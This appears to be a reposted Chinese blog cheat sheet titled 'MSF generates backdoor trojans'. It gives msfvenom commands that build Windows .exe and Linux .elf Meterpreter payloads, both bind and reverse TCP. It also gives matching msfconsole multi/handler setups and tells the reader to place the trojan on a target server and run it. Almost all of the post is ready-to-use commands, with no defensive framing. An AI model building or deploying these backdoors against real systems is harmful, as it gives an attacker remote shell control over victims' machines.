0


MSF生成后门木马

前言

为了方便平时使用,记录一下操作命令

文章目录


一、正向连接的木马🍺

注意:

lhost

为本地地址,

rhost

为目标地址

1、👋Windows

生成连接木马

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.63.135 lport=6666-f exe -o test.exe

将木马放到目标服务器运行

使用模块连接我们的木马

msfconsole                                         
use exploit/multi/handler                          
set payload windows/x64/meterpreter/bind_tcp         
set rhost 192.168.53.135                           # 目标主机ip
set lport 6666                                     
exploit 

2、👋Linux

使用

msfvenom

模块生成连接木马

msfvenom -p linux/x64/meterpreter/bind_tcp lhost=192.168.53.135 lport=6666-f elf > test.elf
  • x64生成64位的🐎
  • x86生成32位的🐎
elf

为可执行的二进制文件
若传入的木马没权限执行

chmod +x test.elf  # 给木马程序赋予可执行权限

使用模块进行连接

msfconsole                                        
use exploit/multi/handler                         
set payload linux/x64/meterpreter/bind_tcp       
set rhost 192.168.53.135                        # 目标主机ip  
set lport 6666                                    
exploit 

二、反向连接的木马🍺

1、👋Windows

使用模块生成反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.53.135 lport=6666-f exe -o test.exe

监听反弹的木马

msfconsole                                         
use exploit/multi/handler                          
set payload windows/x64/meterpreter/reverse_tcp         
set lhost 192.168.53.135                          # 我们的本机IP
set lport 6666                                     
exploit                                           

2、👋Linux

生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.53.135  LPORT=6666-f elf > test.elf

监听反弹的木马

msfconsole                                         
use exploit/multi/handler                          
set payload linux/x64/meterpreter/reverse_tcp        
set lhost 192.168.53.135                         
set lport 6666                                    
exploit                                           
标签: 网络安全

本文转载自: https://blog.csdn.net/m0_55793759/article/details/127786540
版权归原作者 迷途羔羊pro 所有, 如有侵权,请联系我们删除。

“MSF生成后门木马”的评论:

还没有评论